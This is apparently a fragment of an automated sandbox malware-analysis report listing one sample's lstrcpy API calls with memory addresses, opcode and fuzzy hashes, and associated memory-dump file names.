                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: bc9da1bbf2eaceea29a5078482dce79284d1c9a5ecec83d7eb719f15a6e98b5d
                            • Instruction ID: 9a8887f91e6d1a90787d0b4d38fb565efe8d036714aa50792b8156a718768167
                            • Opcode Fuzzy Hash: bc9da1bbf2eaceea29a5078482dce79284d1c9a5ecec83d7eb719f15a6e98b5d
                            • Instruction Fuzzy Hash: 60212B74601B12ABDB35DF7AD858A1BB7F8BF58741B044A1CE496C7A60DB30F890CB90
                            Function 00121610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 0012162D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012164F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121671
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121693
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 363bf1f1f374d9e7b2272324bdc9e6f22b63dfc25deefc39fd67c74fb9f5e353
                            • Instruction ID: ee4b836a1a2afb26aa8ebf2e0b9528d79deb069aa9a2f660dfd350da6f81feb2
                            • Opcode Fuzzy Hash: 363bf1f1f374d9e7b2272324bdc9e6f22b63dfc25deefc39fd67c74fb9f5e353
                            • Instruction Fuzzy Hash: 5F112E74A11B22ABDB24DF35E408A2BB7FCFF58705708052DE496C3A50EB70E861CB90